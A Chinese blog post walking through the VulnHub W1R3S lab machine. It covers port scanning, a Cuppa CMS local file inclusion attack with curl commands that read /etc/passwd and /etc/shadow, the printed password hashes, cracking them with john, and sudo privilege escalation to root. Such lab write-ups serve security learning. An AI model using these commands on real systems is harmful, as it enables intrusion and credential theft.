vulnhub/W1R3S.inc

最新推荐文章于 2024-07-11 10:43:08 发布
最新推荐文章于 2024-07-11 10:43:08 发布
阅读量378 收藏 9
点赞数 5
分类专栏: vulnhub靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45230030/article/details/138622597
版权

五一加调休在家躺尸真舒服,咸鱼生活真美啊,可惜结束的太快,啊,继续打靶

下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-

其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。

下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。

攻击机(kali)IP:192.168.59.143

主机发现与端口扫描

1、netdiscover 扫描主机 IP ,发现主机 IP 为 192.168.59.137

3、nmap 扫描主机端口开放,发现 21、22、80、3306 端口开放

nmap -p- -A 192.168.59.137

web渗透

1、dirb 扫描网站目录

dirsearch -u "http://192.168.59.137"

/administrator、/installation、/wordpress/

2、浏览器访问 http://192.168.59.137/administrator

3、网站 title 提示使用了 Cuppa CMS ,

4、查找历史漏洞,发现有个本地文件包含漏洞

searchsploit cuppa

5、将其复制出来看一下

searchsploit -m php/webapps/25971.txt

文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

6、web界面上尝试

没有保存,但是没有返回结果的界面,用 curl 试试

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.59.137/administrator/alerts/alertConfigField.php

在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.59.137/administrator/alerts/alertConfigField.php

发现了 root 、www-data 、 w1r3s 用户的密码,尝试用 john 破解

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

john pwd.txt
# 得到密码
www-data:www-data(/usr/sbin/noglogin 不能登陆)
w1r3s:computer

提权

1、ssh 远程连接 w1r3s 用户

ssh w1r3s@192.168.59.137

2、尝试 sudo 提权,发现该用户可以在任何地方执行任何名称文件获取 root 权限

sudo -l

3、随便写一个 sh 文件,赋权并以 sudo 命令执行,成功提权

echo '/bin/bash' >> root.sh
chmod +x root.sh
sudo ./root.sh

4、在 /root 目录下找到 flag.txt

至此打靶结束

L如初
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSharpVitamins.ShortGuid:一个方便的包装器,用于处理base64编码的Guid
05-03
沙特维生素 一个方便包装器,用于处理URL安全的base64编码的全局唯一标识符(GUID),从而使字符串值更短(22个字符对36个字符)。 网址安全的base64? 那只是一个base64字符串,用众所周知的特殊字符替换(/,+)...
[e2ee]六间房直播WSS包解密,加密源码-易语言
06-14
六间房直播,搞直播这块的应该知道这平台 这个封包是base64加密 解密,加上他们自己的一套算法 原密文:TVHLboMwEPyXPaPgBwbMuVLVQ6Ve2kupKgcMoQ3YMgYlivLvXWwi9WDv7GPWs(sbdGfVQwWEUEigMZPXk4fqBv5q9...
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 463
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
vulnhub靶场——W1R3S: 1.0.1
Czheisenberg的博客
12-16 602
ftp匿名登录。Cuppa CMS 存在文件包含漏洞。/etc/passwd 和 /etc/shadow 的利用/etc/shadow 可破解。
VulnHub-W1R3S 1.0.1
Wscsd_的博客
07-12 77
您已受聘对 W1R3S.inc 个人服务器进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到Flag(位于 /root 目录中)。 获得低特权 shell 的难度:初级/中级 权限提升难度:初级/中级
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub
qq_63442530的博客
03-13 910
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
VulnHub-W1R3S: 1.0.1-靶机渗透学习
嗯嗯呐的博客
11-21 1618
**靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中等(CTF) 靶机描述:你被雇来对W1R3S做渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。 目标:得到root权限目录信息收集LFI漏洞利用john密码破解提权总结 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3187
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
渗透靶场之W1R3S
m0_56190544的博客
06-26 420
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
No.5-VulnHub-W1R3S: 1-Walkthrough渗透学习
qq_34801745的博客
12-31 1135
** VulnHub-W1R3S: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中级(CTF) 靶机发布日期:2018年2月5日 靶机描述:You have been hired to do a penetration test on the W1R3S.inc individual server ...
W1R3S 1.0.1-vulnhub靶机-渗透测试思路
m0_61361405的博客
09-23 196
vulnhub网站上下载相应的文件,并解压。然后打开VMware,左上角文件→打开,选择解压后的文件夹nmap扫描与分析。
【原创】项目五w1r3s.v1.0.doc
07-12
【原创】项目五w1r3s.v1.0.doc
垃圾分类管理系统,https://m.tb.cn/h.fnwAcQv?tk=ag0a2gXQX2d
03-18
垃圾分类管理系统,Java语言,MySQL,基于SSM框架,垃圾类别管理,垃圾投放预约,上门预约回收,垃圾分类交流博客功能,回收员登陆进行预约回收处理,投放地点管理,前台交流模块,管理系统,有文档,资源为网盘地址...
lt.xishao.xyz.zip_lt95.xyz 039_lt95.yxz_lt95xyz卡娃伊_show3ol_www.a
09-21
标题中的"lt.xishao.xyz.zip_lt95.xyz 039_lt95.yxz_lt95xyz卡娃伊_show3ol_www.a"似乎是一个混淆的字符串,它可能包含了多个域名或项目标识符,但具体含义需要更多的上下文才能明确。不过,我们可以将它视为一个...
网络安全测评技术与标准
weixin_48579910的博客
07-06 1328
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
从资金到未来:技术融资如何重塑IT顾问在AI与网络安全的角色?
07-07 642
一方面是人工智能 (AI) 和机器学习 (ML) 的双引擎,另一方面是网络安全和数据泄露威胁中不断变化的威胁形势,IT 格局正在经历翻天覆地的变化。这场数字革命对 IT 顾问来说既是挑战也是机遇,但要成功驾驭它,需要不断学习和技能发展。这就是 IT 顾问的技术资金成为游戏规则改变者的地方,为这些高需求领域的职业发展提供了关键的燃料。全球格局虽然重点一直放在成熟国家的技术资金上,但认...
网络设备安全
最新发布
weixin_48579910的博客
07-11 629
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
医疗器械网络安全| 常见安全漏洞与防护措施
网 安 云
07-08 723
通过加强代码审查和安全测试、采用安全设计原则和最佳实践、加强网络安全保护、实施严格的访问控制、建立安全监控和响应机制、关注并遵循相关标准和规范以及加强安全培训和意识提升等措施,可以有效防止医疗器械软件被攻击和滥用,为患者提供更加安全可靠的医疗服务。
import requests url='https://www.gk100.com/read_16892539.htm' header={"User-Agent" : " Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15"} r=requests.get(url) r.encoding=r.apparent_encoding from bs4 import BeautifulSoup r.text soup = BeautifulSoup(r.text,features="lxml") w1=soup.find_all("td") import pandas as pd result=w1 df=pd.DataFrame(result) df1=df[2:] for index in df1: d1=df1[df1.index%2==0] d2=df1[df1.index%2!=0] d1=d1.reset_index(drop=True) d2=d2.reset_index(drop=True) df2=pd.concat([d1,d2],axis=1) title=['省份','人数/万',] df2.columns=title,这个程序怎么按照第二列的元素进行降序排列
06-10
for index in df1: d1 = df1[df1.index%2==0] d2 = df1[df1.index%2!=0] d1 = d1.reset_index(drop=True) d2 = d2.reset_index(drop=True) df2 = pd.concat([d1,d2], axis=1) # 排序,按照第二列的元素进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值